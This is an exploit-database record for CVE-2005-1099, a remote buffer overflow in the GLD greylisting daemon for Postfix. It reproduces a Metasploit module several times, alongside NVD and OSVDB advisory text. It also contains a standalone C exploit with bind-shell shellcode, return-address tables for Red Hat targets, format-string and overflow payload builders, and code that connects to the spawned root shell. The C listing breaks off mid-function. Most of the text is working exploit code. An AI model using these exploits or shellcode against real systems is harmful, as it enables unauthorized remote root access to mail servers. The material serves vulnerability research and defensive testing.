ID EDB-ID:10023 Type exploitdb Reporter patrick Modified 2005-04-12T00:00:00
Description
Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD <= 1.4 greylisting daemon for Postfix. By sending an
overly long string the stack can be overwritten.
},
'Version' => '$Revision$',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"
sock.put(sploit)
handler
disconnect
end
end
{"id": "EDB-ID:10023", "hash": "4750c40af1534fbeed303822d319d8ad", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow", "description": "Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform", "published": "2005-04-12T00:00:00", "modified": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/10023/", "reporter": "patrick", "references": [], "cvelist": ["CVE-2005-1099"], "lastseen": "2016-02-01T11:45:09", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/10023/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\n\tclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack overflow in the Salim Gasmi\r\n\t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\r\n\t\t\t\toverly long string the stack can be overwritten.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision$',\r\n\t\t\t'Author'\t=> [ 'patrick' ],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1099' ],\r\n\t\t\t\t\t[ 'OSVDB', '15492' ],\r\n\t\t\t\t\t[ 'BID', '13129' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/934' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20=\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(2525)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = \"sender=\"+ payload.encoded + \"\\r\\n\"\r\n\t\tsploit << \"client_address=\" + [target['Ret']].pack('V') * 300 + \"\\r\\n\\r\\n\"\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["15492"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-07-11T11:14:51", "references": ["http://marc.info/?l=bugtraq&m=111339935903880&w=2", "http://security.gentoo.org/glsa/glsa-200504-10.xml", "http://securitytracker.com/alerts/2005/Apr/1013678.html", "http://marc.info/?l=bugtraq&m=111342432325670&w=2", "http://www.gasmi.net/down/gld-history", "https://exchange.xforce.ibmcloud.com/vulnerabilities/20066"], "description": "Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.", "edition": 3, "reporter": "NVD", "published": "2005-04-12T00:00:00", "title": "CVE-2005-1099", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:51", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2005-1099"], "scanner": [], "modified": "2017-07-10T21:32:31", "cpe": ["cpe:/a:salim_gasmi:gld:1.0", "cpe:/a:salim_gasmi:gld:1.2", "cpe:/a:salim_gasmi:gld:1.4", "cpe:/a:salim_gasmi:gld:1.1", "cpe:/a:salim_gasmi:gld:1.3", "cpe:/a:salim_gasmi:gld:1.3.1"], "id": "CVE-2005-1099", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1099", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.gasmi.net/gld.html\nSecurity Tracker: 1013678\n[Secunia Advisory ID:14941](https://secuniaresearch.flexerasoftware.com/advisories/14941/)\n[Secunia Advisory ID:14951](https://secuniaresearch.flexerasoftware.com/advisories/14951/)\n[Related OSVDB ID: 15493](https://vulners.com/osvdb/OSVDB:15493)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200504-10.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0174.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0169.html\nKeyword: INetCop Security Advisory #2005-0x82-026\nKeyword: TCP port 2525\nKeyword: GreyList Daemon\n[CVE-2005-1099](https://vulners.com/cve/CVE-2005-1099)\n", "reporter": "dong-houn yoU(xploit@hackermail.com)", "published": "2005-04-12T02:38:52", "title": "GLD server.c Remote Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Gld", "version": "1.4", "operator": "eq"}, {"name": "Gld", "version": "1.3", "operator": "eq"}], "cvelist": ["CVE-2005-1099"], "modified": "2005-04-12T02:38:52", "href": "https://vulners.com/osvdb/OSVDB:15492", "id": "OSVDB:15492", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:39", "references": [], "edition": 1, "description": "", "reporter": "patrick", "published": "2009-10-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "GLD (Greylisting Daemon) Postfix Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1099"], "modified": "2009-10-27T00:00:00", "href": "https://packetstormsecurity.com/files/82242/GLD-Greylisting-Daemon-Postfix-Buffer-Overflow.html", "id": "PACKETSTORM:82242", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the Salim Gasmi \nGLD <= 1.4 greylisting daemon for Postfix. By sending an \noverly long string the stack can be overwritten. \n}, \n'Version' => '$Revision$', \n'Author' => [ 'patrick' ], \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'References' => \n[ \n[ 'CVE', '2005-1099' ], \n[ 'OSVDB', '15492' ], \n[ 'BID', '13129' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/934' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20=\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(2525) \n], \nself.class \n) \nend \n \ndef exploit \nconnect \n \nsploit = \"sender=\"+ payload.encoded + \"\\r\\n\" \nsploit << \"client_address=\" + [target['Ret']].pack('V') * 300 + \"\\r\\n\\r\\n\" \n \nsock.put(sploit) \nhandler \ndisconnect \n \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82242/gld_postfix.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:38:24", "osvdbidlist": ["15492"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "GLD (Greylisting Daemon) Postfix Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform", "reporter": "metasploit", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "GLD Greylisting Daemon Postfix Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1099"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16841", "href": "https://www.exploit-db.com/exploits/16841/", "sourceData": "##\r\n# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\n\tclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in the Salim Gasmi\r\n\t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\r\n\t\t\t\toverly long string the stack can be overwritten.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=> [ 'patrick' ],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1099' ],\r\n\t\t\t\t\t[ 'OSVDB', '15492' ],\r\n\t\t\t\t\t[ 'BID', '13129' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/934' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20=\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Apr 12 2005'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(2525)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = \"sender=\"+ payload.encoded + \"\\r\\n\"\r\n\t\tsploit << \"client_address=\" + [target['Ret']].pack('V') * 300 + \"\\r\\n\\r\\n\"\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16841/"}, {"lastseen": "2016-02-03T01:16:13", "osvdbidlist": ["15492"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability. CVE-2005-1099. Remote exploit for linux platform", "reporter": "Xpl017Elz", "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1099"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25392", "href": "https://www.exploit-db.com/exploits/25392/", "sourceData": "source: http://www.securityfocus.com/bid/13129/info\r\n\r\nIt is reported that GLD contains a buffer overflow vulnerability. This issue is due to a failure of the application to properly ensure that a fixed-size memory buffer is sufficiently large prior to copying user-supplied input data into it.\r\n\r\nRemote attackers may exploit this vulnerability to cause arbitrary machine code to be executed in the context of the affected service. As the service is designed to be run as the superuser, remote attackers may gain superuser privileges on affected computers.\r\n\r\nGLD version 1.4 is reportedly affected, but prior versions may also be affected. \r\n\r\n/*\r\n**\r\n**\r\n** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow format string exploit.\r\n** (c) 2005 Team INetCop Security.\r\n**\r\n** Nickname of this code is,\r\n** `Kill two bird with one stone.' or, `One shot, two kill!.'\r\n** hehehe ;-D\r\n**\r\n** Advisory URL: http://x82.inetcop.org/h0me/adv1sor1es/INCSA.2005-0x82-026-GLD.txt\r\n**\r\n** It's as well as RedHat Linux and to gentoo, debian Linux, *BSD.\r\n** You can develop for your flatform.\r\n**\r\n** --\r\n** exploit by \"you dong-hun\"(Xpl017Elz), <szoahc@hotmail.com>.\r\n** My World: http://x82.inetcop.org\r\n**\r\n**\r\n** P.S: My domain x82.i21c.net encountered compulsion withdrawal from the country.\r\n** They are killing many hackers of the Korea. hehehe ;-p\r\n**\r\n*/\r\n/*\r\n**\r\n** These days, the main issue that strikes Korea is small rocky island \"Dokdo\".\r\n** You can get more detailed information from following websites.\r\n**\r\n** \"Japanese goverment has to follow and learn from German goverment\"\r\n**\r\n** I can confidently say \"Dokdo is belong to Korea\".\r\n**\r\n** (1) reference \r\n**\r\n** 1) Their claim that the East Sea has some historical precedent worked,\r\n** as some major book and map publishers, educational web sites and other\r\n** reference materials now include the East Sea name along with the Sea of Japan.\r\n** - worldatlas.com-\r\n**\r\n** http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm\r\n**\r\n** 2) On historical perspective and in international law, why there\r\n** is no valid dispute over the ownership of Dokdo.\r\n**\r\n** http://www.prkorea.com/english/textbook/ge03.html\r\n**\r\n** 3)Truth in scholarship\r\n**\r\n** http://www.prkorea.com/english/textbook/maintruth.html\r\n**\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n#define DEF_HOST \"localhost\"\r\n#define PORT 2525\r\n\r\nstruct os_t {\r\n\tint number;\r\n\tchar *os_type;\r\n\tunsigned long dtors_addr;\r\n\tunsigned long shell;\r\n\tint sflag;\r\n};\r\n\r\nstruct os_t platform[]={\r\n\t{\r\n\t\t0,\"Red Hat Linux release 7.0 (Guinness) gld 1.4 (format string exploit)\",\r\n\t\t0x0804db98,0xbfffa3bc,15\r\n\t},\r\n\t{\r\n\t\t1,\"Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)\",\r\n\t\t0x0804d14c,0x0805506e,15\r\n\t},\r\n\t{\r\n\t\t2,\"Red Hat Linux release 7.0 (Guinness) gld 1.4 (buffer overflow exploit)\",\r\n\t\t0,0xbfffa5d8,300\r\n\t},\r\n\t{\r\n\t\t/* jmp *%esp method */\r\n\t\t3,\"Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)\",\r\n\t\t0,0x4212c5eb,254\r\n\t},\r\n\t{\r\n\t\t4,NULL,0,0,0\r\n\t}\r\n};\r\n\r\nint __debug_chk=0;\r\nchar t_atk[0xfff*3];\r\n// This is lovable shellcode, that's sweet in linux platform. \r\nchar shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */\r\n\t\"\\xeb\\x72\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\"\r\n\t\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x43\\xc6\\x46\\x10\\x10\\x66\\x89\"\r\n\t\"\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\\x46\\x18\\xb0\\x90\\x66\\x89\"\r\n\t\"\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x89\"\r\n\t\"\\x5e\\x0c\\x43\\x43\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\\x56\\x10\\xb0\\x66\"\r\n\t\"\\x43\\xcd\\x80\\x86\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\"\r\n\t\"\\xb0\\x3f\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\"\r\n\t\"\\xb0\\x0b\\xcd\\x80\\xe8\\x89\\xff\\xff\\xff/bin/sh\";\r\n\r\nvoid banrl();\r\nint make_bof_code(unsigned long shell,int size,int type);\r\nint make_fmt_code(unsigned long retloc,unsigned long shell,int sflag);\r\nint setsock(char *host,int port);\r\nvoid usage(char *args);\r\nvoid re_connt(int sock);\r\nvoid conn_shell(int sock);\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tint sock,type=0;\r\n\tint port=(PORT);\r\n\tchar host[256]=DEF_HOST;\r\n\r\n\tint sflag=platform[type].sflag;\r\n\tunsigned long retloc=platform[type].dtors_addr;\r\n\tunsigned long shell=platform[type].shell;\r\n\r\n\t(void)banrl();\r\n\twhile((sock=getopt(argc,argv,\"DdF:f:R:r:S:s:H:h:T:t:Ii\"))!=EOF) {\r\n\t\textern char *optarg;\r\n\t\tswitch(sock) {\r\n\t\t\tcase 'D':\r\n\t\t\tcase 'd':\r\n\t\t\t\t__debug_chk=1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'R':\r\n\t\t\tcase 'r':\r\n\t\t\t\tretloc=strtoul(optarg,NULL,0);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'S':\r\n\t\t\tcase 's':\r\n\t\t\t\tshell=strtoul(optarg,NULL,0);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'F':\r\n\t\t\tcase 'f':\r\n\t\t\t\tsflag=atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'H':\r\n\t\t\tcase 'h':\r\n\t\t\t\tmemset((char *)host,0,sizeof(host));\r\n\t\t\t\tstrncpy(host,optarg,sizeof(host)-1);\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'T':\r\n\t\t\tcase 't':\r\n\t\t\t\ttype=atoi(optarg);\r\n\t\t\t\tif(type>=4){\r\n\t\t\t\t\t(void)usage(argv[0]);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tretloc=platform[type].dtors_addr;\r\n\t\t\t\t\tshell=platform[type].shell;\r\n\t\t\t\t\tsflag=platform[type].sflag;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'I':\r\n\t\t\tcase 'i':\r\n\t\t\t\t(void)usage(argv[0]);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '?':\r\n\t\t\t\tfprintf(stderr,\"Try `%s -i' for more information.\\n\\n\",argv[0]);\r\n\t\t\t\texit(-1);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\tfprintf(stdout,\" #\\n # target host: %s:%d\\n\",host,port);\r\n\tfprintf(stdout,\" # type: %s\\n\",platform[type].os_type);\r\n\tswitch(type)\r\n\t{\r\n\t\tcase 0:\r\n\t\tcase 1:\r\n\t\t\t(int)make_fmt_code(retloc,shell,sflag);\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t(int)make_bof_code(shell,sflag,0);\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t(int)make_bof_code(shell,sflag,1);\r\n\t}\r\n\r\n\tfprintf(stdout,\" # send code size: %d byte\\n\",strlen(t_atk));\r\n\tsock=setsock(host,port);\r\n\t(void)re_connt(sock);\r\n\r\n\tif(__debug_chk) sleep(10);\r\n\r\n\tsend(sock,t_atk,strlen(t_atk),0);\r\n\tclose(sock);\r\n\r\n\tfprintf(stdout,\" #\\n # Waiting rootshell, Trying %s:36864 ...\\n\",host);\r\n\tsleep(1);\r\n\tsock=setsock(host,36864);\r\n\t(void)re_connt(sock);\r\n\r\n\tfprintf(stdout,\" # connected to %s:36864 !\\n #\\n\\n\",host);\r\n\t(void)conn_shell(sock);\r\n}\r\n\r\nint make_bof_code(unsigned long shell,int size,int type)\r\n{\r\n\tint a,b;\r\n\tchar nop_shell[8192];\r\n\tchar code_buf[4096];\r\n\r\n\tmemset((char *)nop_shell,0,sizeof(nop_shell));\r\n\tmemset((char *)code_buf,0,sizeof(code_buf));\r\n\tmemset((char *)t_atk,0,sizeof(t_atk));\r\n\r\n\tswitch(type)\r\n\t{\r\n\t\tcase 0:\r\n\t\t\tfprintf(stdout,\" # method: normal overflow exploit: %d byte\\n\",size);\r\n\t\t\t/* sender buffer = nop, shellcode */\r\n\t\t\tfor(a=0;a<1000-strlen(shellcode);a++)\r\n\t\t\t\tnop_shell[a]='N';\r\n\t\t\tfor(b=0;b<strlen(shellcode);b++)\r\n\t\t\t\tnop_shell[a++]=shellcode[b];\r\n\t\t\t/* client_address = retaddr */\r\n\t\t\tfor(b=0;b<size*4;b+=4)\r\n\t\t\t\t*(long *)&code_buf[b]=shell;\r\n\r\n\t\t\tsnprintf(t_atk,sizeof(t_atk)-1,\r\n\t\t\t\t\"sender=%s\\r\\n\"\r\n\t\t\t\t\"client_address=%s\\r\\n\\r\\n\",nop_shell,code_buf);\r\n\t\t\tbreak;\r\n\r\n\t\tcase 1:\r\n\t\t\tfprintf(stdout,\" # method: jmp *%%esp exploit: %d byte\\n\",size);\r\n\t\t\t/* sender buffer */\r\n\t\t\tfor(a=0;a<1000;a++)\r\n\t\t\t\tnop_shell[a]='N';\r\n\t\t\t/* client_address buffer */\r\n\t\t\tfor(b=0;b<size*4;b+=4)\r\n\t\t\t\t*(long *)&code_buf[b]=0x82828282;\r\n\t\t\t/* ebp */\r\n\t\t\t*(long *)&code_buf[b]=0x41414141;\r\n\t\t\tb+=4;\r\n\t\t\t/* eip (jmp *%esp) */\r\n\t\t\t*(long *)&code_buf[b]=(shell);\r\n\t\t\tb+=4;\r\n\t\t\t/* jmp nop (0xeb,0x08) */\r\n\t\t\t*(long *)&code_buf[b]=0x08eb08eb;\r\n\t\t\tb+=4;\r\n\t\t\t/* dummy, nop */\r\n\t\t\t// 0x0804d280 0xbfffe1c8 0x08049521\r\n\t\t\t*(long *)&code_buf[b]=0x0804d280;\r\n\t\t\tb+=4;\r\n\t\t\t*(long *)&code_buf[b]=0x90909090;//0xbfffe1c8;\r\n\t\t\tb+=4;\r\n\t\t\t*(long *)&code_buf[b]=0x90909090;//0x08049521;\r\n\t\t\tb+=4;\r\n\t\t\t*(long *)&code_buf[b]=0x90909090;\r\n\t\t\tb+=4;\r\n\t\t\t/* shellcode */\r\n\t\t\tfor(a=0;a<strlen(shellcode);a++)\r\n\t\t\t\tcode_buf[b++]=shellcode[a];\r\n\r\n\t\t\tsnprintf(t_atk,sizeof(t_atk)-1,\r\n\t\t\t\t\"sender=%s\\r\\n\"\r\n\t\t\t\t\"client_address=%s\\r\\n\\r\\n\",nop_shell,code_buf);\r\n\t}\r\n}\r\n\r\nint make_fmt_code(unsigned long retloc,unsigned long shell,int sflag)\r\n{\r\n\tunsigned char header[256];\r\n\tunsigned char nop_shell[8192];\r\n\tint a,b,c,d,e,f;\r\n\tint addr1,addr2,addr3,addr4;\r\n\ta=b=c=d=e=f=addr1=addr2=addr3=addr4=0;\r\n\r\n\tmemset((char *)header,0,sizeof(header));\r\n\tmemset((char *)nop_shell,0,sizeof(nop_shell));\r\n\tmemset((char *)t_atk,0,sizeof(t_atk));\r\n\r\n\tfprintf(stdout,\" # Make format string, .dtors: %p\\n\",retloc);\r\n\r\n\t*(long *)&header[0]=retloc+0;\r\n\t*(long *)&header[4]=retloc+1;\r\n\t*(long *)&header[8]=retloc+2;\r\n\t*(long *)&header[12]=retloc+3;\r\n\r\n\ta=(shell>>24)&0xff;\r\n\taddr1=(shell>>24)&0xff;\r\n\tb=(shell>>16)&0xff;\r\n\taddr2=(shell>>16)&0xff;\r\n\tc=(shell>>8)&0xff;\r\n\taddr3=(shell>>8)&0xff;\r\n\td=(shell>>0)&0xff;\r\n\taddr4=(shell>>0)&0xff;\r\n\r\n\tif((addr4-16-65)<10)d+=0x100;\r\n\tif((addr3-addr4)<10)c+=0x100;\r\n\tif((addr2-addr3)<10)b+=0x100;\r\n\r\n\tfor(e=0;e<320-strlen(shellcode);e++)\r\n\t\tnop_shell[e]='N';\r\n\tfor(f=0;f<strlen(shellcode);f++)\r\n\t\tnop_shell[e++]=shellcode[f];\r\n\r\n\tfprintf(stdout,\" #\\n # shellcode addr: %p, size: %d byte\\n\",shell,strlen(nop_shell));\r\n\tsnprintf(t_atk,sizeof(t_atk)-1,\r\n\t\t\"client_address=%s\" /* header */\r\n\t\t\"%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n\" /* fmt code */\r\n\t\t\"%s\\r\\n\\r\\n\", /* shellcode */\r\n\t\theader,d-16-65,(sflag+0),c-addr4,(sflag+1),b-addr3,\r\n\t\t(sflag+2),0x100+a-addr2,(sflag+3),nop_shell);\r\n}\r\n\r\nvoid re_connt(int sock)\r\n{\r\n\tif(sock==-1)\r\n\t{\r\n\t\tfprintf(stdout,\" #\\n # Failed.\\n\");\r\n\t\tfprintf(stdout,\" # Happy Exploit ! :-)\\n #\\n\\n\");\r\n\t\texit(-1);\r\n\t}\r\n}\r\n \r\nint setsock(char *host,int port)\r\n{\r\n\tint sock;\r\n\tstruct hostent *he;\r\n\tstruct sockaddr_in x82_addr;\r\n \r\n\tif((he=gethostbyname(host))==NULL)\r\n\t{\r\n\t\therror(\" # gethostbyname() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\r\n\tif((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)\r\n\t{\r\n\t\tperror(\" # socket() 